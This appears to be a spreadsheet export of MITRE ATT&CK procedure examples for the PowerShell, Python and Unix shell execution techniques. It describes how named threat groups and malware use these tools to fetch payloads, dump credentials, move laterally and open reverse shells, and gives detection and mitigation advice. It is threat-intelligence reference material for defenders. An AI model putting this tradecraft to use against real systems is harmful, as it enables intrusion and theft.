[FIN7](https://attack.mitre.org/groups/G0046) used a PowerShell script to launch shellcode that retrieved an additional payload.(Citation: FireEye FIN7 April 2017)(Citation: Morphisec FIN7 June 2017)(Citation: FBI Flash FIN7 USB)(Citation: Mandiant FIN7 Apr 2022)
FIN8
[FIN8](https://attack.mitre.org/groups/G0061)'s malicious spearphishing payloads are executed as [PowerShell](https://attack.mitre.org/techniques/T1059/001). [FIN8](https://attack.mitre.org/groups/G0061) has also used [PowerShell](https://attack.mitre.org/techniques/T1059/001) for lateral movement and credential access.(Citation: FireEye Obfuscation June 2017)(Citation: Bitdefender FIN8 July 2021)(Citation: FireEye Know Your Enemy FIN8 Aug 2016)(Citation: Symantec FIN8 Jul 2023)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used PowerShell scripts to access credential data.(Citation: CISA AA20-259A Iran-Based Actor September 2020)
GALLIUM
[GALLIUM](https://attack.mitre.org/groups/G0093) used PowerShell for execution to assist in lateral movement as well as for dumping credentials stored on compromised machines.(Citation: Cybereason Soft Cell June 2019)
GOLD SOUTHFIELD
[GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) has staged and executed PowerShell scripts on compromised hosts.(Citation: Tetra Defense Sodinokibi March 2020)
Gallmaker
[Gallmaker](https://attack.mitre.org/groups/G0084) used PowerShell to download additional payloads and for execution.(Citation: Symantec Gallmaker Oct 2018)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has used obfuscated PowerShell scripts for staging.(Citation: Microsoft Actinium February 2022)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) malware can use PowerShell commands to download and execute a payload and open a decoy document on the victim’s machine.(Citation: Unit 42 Gorgon Group Aug 2018)
HAFNIUM
[HAFNIUM](https://attack.mitre.org/groups/G0125) has used the Exchange Power Shell module &lt;code&gt;Set-OabVirtualDirectoryPowerShell&lt;/code&gt; to export mailbox data.(Citation: Microsoft HAFNIUM March 2020)(Citation: Volexity Exchange Marauder March 2021)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used PowerShell-based tools and scripts for discovery and collection on compromised hosts.(Citation: SecureWorks August 2019)(Citation: Kaspersky APT Trends Q1 April 2021)(Citation: Kaspersky Lyceum October 2021)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used PowerShell to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used PowerShell [Empire](https://attack.mitre.org/software/S0363) for execution of malware.(Citation: Crowdstrike Indrik November 2018)(Citation: Symantec WastedLocker June 2020) 
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has executed a variety of PowerShell scripts.(Citation: EST Kimsuky April 2019)(Citation: CISA AA20-301A Kimsuky)(Citation: Talos Kimsuky Nov 2021)(Citation: KISA Operation Muzabi)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used PowerShell to execute commands and malicious code.(Citation: Google TAG Lazarus Jan 2021)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used PowerShell scripts to execute malicious code.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used PowerShell for execution.(Citation: Proofpoint Leviathan Oct 2017)(Citation: FireEye Periscope March 2018)(Citation: CISA AA21-200A APT40 July 2021)(Citation: Accenture MUDCARP March 2019)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) has used PowerShell for execution and privilege escalation.(Citation: Unit 42 Magic Hound Feb 2017)(Citation: FireEye APT35 2018)(Citation: DFIR Report APT35 ProxyShell March 2022)(Citation: DFIR Phosphorus November 2021)(Citation: Microsoft Iranian Threat Actor Trends November 2021)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) used PowerShell implants on target machines.(Citation: Kaspersky MoleRATs April 2019)
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used plugins to execute PowerShell scripts.(Citation: MoustachedBouncer ESET August 2023)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used PowerShell for execution.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: Talos MuddyWater May 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: Talos MuddyWater Jan 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has used malicious PowerShell scripts to enable execution.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)
Nomadic Octopus
[Nomadic Octopus](https://attack.mitre.org/groups/G0133) has used PowerShell for execution.(Citation: ESET Nomadic Octopus 2018) 
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used PowerShell scripts for execution, including use of a macro to run a PowerShell command to decode file contents.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig New Delivery Oct 2017)(Citation: Crowdstrike Helix Kitten Nov 2018)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) used [PowerSploit](https://attack.mitre.org/software/S0194) to download payloads, run a reverse shell, and execute malware on the victim's machine.(Citation: Cymmetria Patchwork)(Citation: TrendMicro Patchwork Dec 2017)
Poseidon Group
The [Poseidon Group](https://attack.mitre.org/groups/G0033)'s Information Gathering Tool (IGT) includes PowerShell components.(Citation: Kaspersky Poseidon Group)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Dragos Crashoverride 2018) 
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used PowerShell to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used PowerShell to download and execute payloads.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware uses PowerShell commands to perform various functions, including gathering system information via WMI and executing commands from its C2 server.(Citation: Citizen Lab Stealth Falcon May 2016)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used PowerShell to download files and to inject into various Windows processes.(Citation: Proofpoint TA2541 February 2022)
TA459
[TA459](https://attack.mitre.org/groups/G0062) has used PowerShell for execution of a payload.(Citation: Proofpoint TA459 April 2017)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used PowerShell to download and execute malware and reconnaissance scripts.(Citation: Proofpoint TA505 Sep 2017)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Cybereason TA505 April 2019)(Citation: Deep Instinct TA505 Apr 2019)
TEMP.Veles
[TEMP.Veles](https://attack.mitre.org/groups/G0088) has used a publicly-available PowerShell-based tool, WMImplant.(Citation: FireEye TEMP.Veles 2018) The group has also used PowerShell to perform [Timestomp](https://attack.mitre.org/techniques/T1070/006)ing.(Citation: FireEye TRITON 2019)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has executed PowerShell commands in batch scripts.(Citation: ATT TeamTNT Chimaera September 2020)
Threat Group-3390
[Threat Group-3390](https://attack.mitre.org/groups/G0027) has used PowerShell for execution.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Trend Micro DRBControl February 2020)
Thrip
[Thrip](https://attack.mitre.org/groups/G0076) leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance.(Citation: Symantec Thrip June 2018)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used PowerShell to download additional payloads.(Citation: ESET Exchange Mar 2021)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used PowerShell to execute commands/scripts, in some cases via a custom executable or code from [Empire](https://attack.mitre.org/software/S0363)'s PSInject.(Citation: ESET Turla Mosquito May 2018)(Citation: ESET Turla PowerShell May 2019)(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) has also used PowerShell scripts to load and execute malware in memory.
Volt Typhoon
[Volt Typhoon](https://attack.mitre.org/groups/G1017) has used PowerShell including for remote system discovery.(Citation: Microsoft Volt Typhoon May 2023)(Citation: Joint Cybersecurity Advisory Volt Typhoon June 2023)
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has used PowerShell for script execution.(Citation: Lab52 WIRTE Apr 2019)
Wizard Spider
[Wizard Spider](https://attack.mitre.org/groups/G0102) has used macros to execute PowerShell scripts to download malware on victim's machines.(Citation: CrowdStrike Grim Spider May 2019) It has also used PowerShell to execute commands and move laterally through a victim network.(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020)(Citation: FireEye KEGTAP SINGLEMALT October 2020)(Citation: Red Canary Hospital Thwarted Ryuk October 2020)(Citation: Mandiant FIN12 Oct 2021)
menuPass
[menuPass](https://attack.mitre.org/groups/G0045) uses [PowerSploit](https://attack.mitre.org/software/S0194) to inject shellcode into PowerShell.(Citation: PWC Cloud Hopper Technical Annex April 2017)(Citation: Symantec Cicada November 2020)
AADInternals
[AADInternals](https://attack.mitre.org/software/S0677) is written and executed via PowerShell.(Citation: AADInternals Documentation)
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to execute its payload via PowerShell.(Citation: Malwarebytes Kimsuky June 2021)
AutoIt backdoor
[AutoIt backdoor](https://attack.mitre.org/software/S0129) downloads a PowerShell script that decodes to a typical shellcode loader.(Citation: Forcepoint Monsoon)
BADHATCH
[BADHATCH](https://attack.mitre.org/software/S1081) can utilize `powershell.exe` to execute commands on a compromised host.(Citation: Gigamon BADHATCH Jul 2019)(Citation: BitDefender BADHATCH Mar 2021)
BONDUPDATER
[BONDUPDATER](https://attack.mitre.org/software/S0360) is written in PowerShell.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has used PowerShell loaders as part of execution.(Citation: CheckPoint Bandook Nov 2020)
Bazar
[Bazar](https://attack.mitre.org/software/S0534) can execute a PowerShell script received from C2.(Citation: NCC Group Team9 June 2020)(Citation: CrowdStrike Wizard Spider October 2020)
Black Basta
[Black Basta](https://attack.mitre.org/software/S1070) has used PowerShell scripts for discovery and to execute files over the network.(Citation: Trend Micro Black Basta May 2022)(Citation: Trend Micro Black Basta Spotlight September 2022)(Citation: NCC Group Black Basta June 2022)
BloodHound
[BloodHound](https://attack.mitre.org/software/S0521) can use PowerShell to pull Active Directory information from the target environment.(Citation: CrowdStrike BloodHound April 2018)
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can use PowerShell for execution.(Citation: Medium Ali Salem Bumblebee April 2022)
CharmPower
[CharmPower](https://attack.mitre.org/software/S0674) can use PowerShell for payload execution and C2 communication.(Citation: Check Point APT35 CharmPower January 2022)
Clambling
The [Clambling](https://attack.mitre.org/software/S0660) dropper can use PowerShell to download the malware.(Citation: Trend Micro DRBControl February 2020)
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)(Citation: Cyberreason Anchor December 2019) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
ComRAT
[ComRAT](https://attack.mitre.org/software/S0126) has used PowerShell to load itself every time a user logs in to the system. [ComRAT](https://attack.mitre.org/software/S0126) can execute PowerShell scripts loaded into memory or from the file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)
ConnectWise
[ConnectWise](https://attack.mitre.org/software/S0591) can be used to execute PowerShell commands on target machines.(Citation: Anomali Static Kitten February 2021)
CrackMapExec
[CrackMapExec](https://attack.mitre.org/software/S0488) can execute PowerShell commands via WMI.(Citation: CME Github September 2018)
CreepyDrive
[CreepyDrive](https://attack.mitre.org/software/S1023) can use Powershell for execution, including the cmdlets `Invoke-WebRequest` and `Invoke-Expression`.(Citation: Microsoft POLONIUM June 2022)
CreepySnail
[CreepySnail](https://attack.mitre.org/software/S1024) can use PowerShell for execution, including the cmdlets `Invoke-WebRequst` and `Invoke-Expression`.(Citation: Microsoft POLONIUM June 2022)
Cuba
[Cuba](https://attack.mitre.org/software/S0625) has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts.(Citation: McAfee Cuba April 2021)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) can execute PowerShell commands and has used PowerShell to execute a keylogger.(Citation: Prevailion DarkWatchman 2021)
Denis
[Denis](https://attack.mitre.org/software/S0354) has a version written in PowerShell.(Citation: Cybereason Cobalt Kitty 2017)	
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via PowerShell.(Citation: Donut Github)	
DownPaper
[DownPaper](https://attack.mitre.org/software/S0186) uses PowerShell for execution.(Citation: ClearSky Charming Kitten Dec 2017)
Egregor
[Egregor](https://attack.mitre.org/software/S0554) has used an encoded PowerShell command by a service created by [Cobalt Strike](https://attack.mitre.org/software/S0154) for lateral movement.(Citation: Intrinsec Egregor Nov 2020)
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has used Powershell to retrieve the malicious payload and download additional resources like [Mimikatz](https://attack.mitre.org/software/S0002). (Citation: Symantec Emotet Jul 2018)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Red Canary Emotet Feb 2019)(Citation: Carbon Black Emotet Apr 2019)
Empire
[Empire](https://attack.mitre.org/software/S0363) leverages PowerShell for the majority of its client-side agent tasks. [Empire](https://attack.mitre.org/software/S0363) also contains the ability to conduct PowerShell remoting with the &lt;code&gt;Invoke-PSRemoting&lt;/code&gt; module.(Citation: Github PowerShell Empire)(Citation: NCSC Joint Report Public Tools)
FatDuke
[FatDuke](https://attack.mitre.org/software/S0512) has the ability to execute PowerShell scripts.(Citation: ESET Dukes October 2019)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) can use PowerShell scripts for execution.(Citation: Kaspersky WIRTE November 2021)
FlawedAmmyy
[FlawedAmmyy](https://attack.mitre.org/software/S0381) has used PowerShell to execute commands.(Citation: Korean FSI TA505 2020)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) has used PowerShell to execute the Meterpreter downloader TinyMet.(Citation: SecureList Griffon May 2019)
HALFBAKED
[HALFBAKED](https://attack.mitre.org/software/S0151) can execute PowerShell scripts.(Citation: FireEye FIN7 April 2017)
HAMMERTOSS
[HAMMERTOSS](https://attack.mitre.org/software/S0037) is known to use PowerShell.(Citation: FireEye APT29)
Hancitor
[Hancitor](https://attack.mitre.org/software/S0499) has used PowerShell to execute commands.(Citation: FireEye Hancitor)
Helminth
One version of [Helminth](https://attack.mitre.org/software/S0170) uses a PowerShell script.(Citation: Palo Alto OilRig May 2016)
JCry
[JCry](https://attack.mitre.org/software/S0389) has used PowerShell to execute payloads.(Citation: Carbon Black JCry May 2019)
JSS Loader
[JSS Loader](https://attack.mitre.org/software/S0648) has the ability to download and execute PowerShell scripts.(Citation: CrowdStrike Carbon Spider August 2021)
KGH_SPY
[KGH_SPY](https://attack.mitre.org/software/S0526) can execute PowerShell commands on the victim's machine.(Citation: Cybereason Kimsuky November 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has used PowerShell commands to download additional files.(Citation: MalwareBytes LazyScripter Feb 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) used PowerShell to download and execute a specific 64-bit version of the malware.(Citation: Talos Konni May 2017)(Citation: Malwarebytes Konni Aug 2021) 
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) uses PowerShell commands to download and execute payloads.(Citation: PWC KeyBoys Feb 2017)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) has used PowerShell to establish persistence.(Citation: MalwareBytes LazyScripter Feb 2021) 
LitePower
[LitePower](https://attack.mitre.org/software/S0680) can use a PowerShell script to execute commands.(Citation: Kaspersky WIRTE November 2021)
Lizar
[Lizar](https://attack.mitre.org/software/S0681) has used PowerShell scripts.(Citation: BiZone Lizar May 2021)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has used PowerShell commands embedded inside batch scripts.(Citation: Talos Lokibot Jan 2021) 
Mafalda
[Mafalda](https://attack.mitre.org/software/S1060) can execute PowerShell commands on a compromised machine.(Citation: SentinelLabs Metador Technical Appendix Sept 2022)
Meteor
[Meteor](https://attack.mitre.org/software/S0688) can use PowerShell commands to disable the network adapters on a victim machines.(Citation: Check Point Meteor Aug 2021)
MoleNet
[MoleNet](https://attack.mitre.org/software/S0553) can use PowerShell to set persistence.(Citation: Cybereason Molerats Dec 2020) 
Mosquito
[Mosquito](https://attack.mitre.org/software/S0256) can launch PowerShell Scripts.(Citation: ESET Turla Mosquito Jan 2018)
NETWIRE
The [NETWIRE](https://attack.mitre.org/software/S0198) binary has been executed via PowerShell script.(Citation: FireEye NETWIRE March 2019)
Netwalker
[Netwalker](https://attack.mitre.org/software/S0457) has been written in PowerShell and executed directly in memory, avoiding detection.(Citation: TrendMicro Netwalker May 2020)(Citation: Sophos Netwalker May 2020)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses PowerShell scripts.(Citation: TrendMicro MacOS April 2018)
POSHSPY
[POSHSPY](https://attack.mitre.org/software/S0150) uses PowerShell to execute various commands, one to execute its payload.(Citation: FireEye POSHSPY April 2017)
POWERSOURCE
[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor.(Citation: FireEye FIN7 March 2017)(Citation: Cisco DNSMessenger March 2017)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) uses PowerShell for obfuscation and execution.(Citation: Unit 42 MuddyWater Nov 2017)(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)(Citation: DHS CISA AA22-055A MuddyWater February 2022)
POWERTON
[POWERTON](https://attack.mitre.org/software/S0371) is written in PowerShell.(Citation: FireEye APT33 Guardrail)
POWRUNER
[POWRUNER](https://a</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives.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executed commands and arguments that may abuse Python commands and scripts for execution.
Process Creation
Monitor systems for abnormal Python usage and python.exe behavior, which could be an indicator of malicious activity. Understanding standard usage patterns is important to avoid a high number of false positives.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newly executed processes that may abuse Python commands and scripts for execution.
Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files. 
Audit
Inventory systems for unauthorized Python installations.
Execution Prevention
Denylist Python where not required.
Limit Software Installation
Prevent users from installing Python where not required.
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors' backdoors were written in Python and compiled with py2exe.(Citation: FoxIT Wocao December 2019)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has developed malware variants written in Python.(Citation: Symantec Seaduke 2015)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used Python scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used a command line utility and a network scanner written in python.(Citation: BitDefender Chafer May 2020)(Citation: FBI FLASH APT39 September 2020)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has made use of Python-based remote access tools.(Citation: Trend Micro Tick November 2019)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.(Citation: US-CERT TA18-074A)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used Python scripts for port scanning or building reverse shells.(Citation: TrendMicro EarthLusca 2022)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used a macOS Python implant to gather data as well as MailFetcher.py code to automatically collect email data.(Citation: CISA AA20-301A Kimsuky)(Citation: KISA Operation Muzabi)
Machete
[Machete](https://attack.mitre.org/groups/G0095) used multiple compiled Python scripts on the victim’s system. [Machete](https://attack.mitre.org/groups/G0095)'s main backdoor [Machete](https://attack.mitre.org/software/S0409) is also written in Python.(Citation: Cylance Machete Mar 2017)(Citation: ESET Machete July 2019)(Citation: 360 Machete Sep 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used developed tools in Python including [Out1](https://attack.mitre.org/software/S0594).(Citation: Trend Micro Muddy Water March 2021)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) has used Python-based malware to install and spread their coinminer.(Citation: Anomali Rocke March 2019)
Tonto Team
[Tonto Team](https://attack.mitre.org/groups/G0131) has used Python-based tools for execution.(Citation: TrendMicro Tonto Team October 2020) 
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used IronPython scripts as part of the [IronNetInjector](https://attack.mitre.org/software/S0581) toolchain to drop payloads.(Citation: Unit 42 IronNetInjector February 2021 )
ZIRCONIUM
[ZIRCONIUM](https://attack.mitre.org/groups/G0128) has used Python-based implants to interact with compromised hosts.(Citation: Google Election Threats October 2020)(Citation: Zscaler APT31 Covid-19 October 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can support commands to execute Python-based payloads.(Citation: CheckPoint Bandook Nov 2020)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used Python scripts for execution and the installation of additional files.(Citation: Cybereason Chaes Nov 2020) 
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Python to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) executes a Python script to download its second stage.(Citation: CoinTicker 2019)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has used python scripts on the user’s system, as well as the Python variant of the [Empire](https://attack.mitre.org/software/S0363) agent, EmPyre.(Citation: Unit42 CookieMiner Jan 2019)
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Python.(Citation: Donut Github)	
DropBook
[DropBook](https://attack.mitre.org/software/S0547) is a Python-based backdoor compiled with PyInstaller.(Citation: Cybereason Molerats Dec 2020)
Ebury
[Ebury](https://attack.mitre.org/software/S0377) has used Python to implement its DGA.(Citation: ESET Ebury Oct 2017)	
IronNetInjector
[IronNetInjector](https://attack.mitre.org/software/S0581) can use IronPython scripts to load payloads with the help of a .NET injector.(Citation: Unit 42 IronNetInjector February 2021 )
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) uses Python scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)
Keydnap
[Keydnap](https://attack.mitre.org/software/S0276) uses Python for scripting to execute additional commands.(Citation: synack 2016 review)
Machete
[Machete](https://attack.mitre.org/software/S0409) is written in Python and is used in conjunction with additional Python scripts.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)(Citation: 360 Machete Sep 2020)
MechaFlounder
[MechaFlounder](https://attack.mitre.org/software/S0459) uses a python-based payload.(Citation: Unit 42 MechaFlounder March 2019)
PUNCHBUGGY
[PUNCHBUGGY](https://attack.mitre.org/software/S0196) has used python scripts.(Citation: Morphisec ShellTea June 2019)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) was executed with a Python script and worked in conjunction with additional Python-based post-exploitation tools.(Citation: Talos PoetRAT April 2020)
Pupy
[Pupy](https://attack.mitre.org/software/S0192) can use an add on feature when creating payloads that allows you to create custom Python scripts (“scriptlets”) to perform tasks offline (without requiring a session) such as sandbox detection, adding persistence, etc.(Citation: GitHub Pupy)
PyDCrypt
[PyDCrypt](https://attack.mitre.org/software/S1032), along with its functions, is written in Python.(Citation: Checkpoint MosesStaff Nov 2021)
Pysa
[Pysa](https://attack.mitre.org/software/S0583) has used Python scripts to deploy ransomware.(Citation: CERT-FR PYSA April 2020)
Remcos
[Remcos](https://attack.mitre.org/software/S0332) uses Python scripts.(Citation: Riskiq Remcos Jan 2018)
SILENTTRINITY
[SILENTTRINITY](https://attack.mitre.org/software/S0692) is written in Python and can use multiple Python scripts for execution on targeted systems.(Citation: GitHub SILENTTRINITY March 2022)(Citation: GitHub SILENTTRINITY Modules July 2019)
Small Sieve
[Small Sieve](https://attack.mitre.org/software/S1035) can use Python scripts to execute commands.(Citation: NCSC GCHQ Small Sieve Jan 2022)
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) uses Python scripts.(Citation: CheckPoint SpeakUp Feb 2019)
Turian
[Turian](https://attack.mitre.org/software/S0647) has the ability to use Python to spawn a Unix shell.(Citation: ESET BackdoorDiplomacy Jun 2021)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse Unix shell commands and scripts for execution. Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt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Process Creation
Monitor for newly executed processes that may abuse Unix shell commands and scripts for execution.
Execution Prevention
Use application control where appropriate.
APT41
[APT41](https://attack.mitre.org/groups/G0096) executed &lt;code&gt;file /bin/pwd&lt;/code&gt; in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)
Rocke
[Rocke](https://attack.mitre.org/groups/G0106) used shell scripts to run commands which would obtain persistence and execute the cryptocurrency mining malware.(Citation: Talos Rocke August 2018)	
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has used shell scripts for execution.(Citation: Trend Micro TeamTNT)(Citation: Cisco Talos Intelligence Group)
Anchor
[Anchor](https://attack.mitre.org/software/S0504) can execute payloads via shell scripting.(Citation: Medium Anchor DNS July 2020)
AppleJeus
[AppleJeus](https://attack.mitre.org/software/S0584) has used shell scripts to execute commands after installation and set persistence mechanisms.(Citation: CISA AppleJeus Feb 2021)(Citation: ObjectiveSee AppleJeus 2019)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)
CallMe
[CallMe](https://attack.mitre.org/software/S0077) has the capability to create a reverse shell on victims.(Citation: Scarlet Mimic Jan 2016)
Chaos
[Chaos](https://attack.mitre.org/software/S0220) provides a reverse shell connection on 8338/TCP, encrypted via AES.(Citation: Chaos Stolen Backdoor)
CoinTicker
[CoinTicker](https://attack.mitre.org/software/S0369) executes a bash script to establish a reverse shell.(Citation: CoinTicker 2019)
CookieMiner
[CookieMiner](https://attack.mitre.org/software/S0492) has used a Unix shell script to run a series of commands targeting macOS.(Citation: Unit42 CookieMiner Jan 2019)
Derusbi
[Derusbi](https://attack.mitre.org/software/S0021) is capable of creating a remote Bash shell and executing commands.(Citation: Fidelis Turbo)(Citation: FireEye Periscope March 2018)
Doki
[Doki](https://attack.mitre.org/software/S0600) has executed shell scripts with /bin/sh.(Citation: Intezer Doki July 20)
Drovorub
[Drovorub](https://attack.mitre.org/software/S0502) can execute arbitrary commands as root on a compromised system.(Citation: NSA/FBI Drovorub August 2020)
Exaramel for Linux
[Exaramel for Linux](https://attack.mitre.org/software/S0401) has a command to execute a shell command on the system.(Citation: ESET TeleBots Oct 2018)(Citation: ANSSI Sandworm January 2021)
Fysbis
[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)
Green Lambert
[Green Lambert](https://attack.mitre.org/software/S0690) can use shell scripts for execution, such as &lt;code&gt;/bin/sh -c&lt;/code&gt;.(Citation: Objective See Green Lambert for OSX Oct 2021)(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021) 
Hildegard
[Hildegard](https://attack.mitre.org/software/S0601) has used shell scripts for execution.(Citation: Unit 42 Hildegard Malware)
Kazuar
[Kazuar](https://attack.mitre.org/software/S0265) uses /bin/bash to execute commands on the victim’s machine.(Citation: Unit 42 Kazuar May 2017)
Kinsing
[Kinsing](https://attack.mitre.org/software/S0599) has used Unix shell scripts to execute commands in the victim environment.(Citation: Aqua Kinsing April 2020)
Kobalos
[Kobalos](https://attack.mitre.org/software/S0641) can spawn a new pseudo-terminal and execute arbitrary commands at the command prompt.(Citation: ESET Kobalos Feb 2021) 
LoudMiner
[LoudMiner](https://attack.mitre.org/software/S0451) used shell scripts to launch various services and to start/stop the QEMU virtualization.(Citation: ESET LoudMiner June 2019)	
MacMa
[MacMa](https://attack.mitre.org/software/S1016) can execute supplied shell commands and uses bash scripts to perform additional actions.(Citation: ESET DazzleSpy Jan 2022)(Citation: Objective-See MacMa Nov 2021)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to use &lt;code&gt;/bin/bash&lt;/code&gt; and &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)
OSX/Shlayer
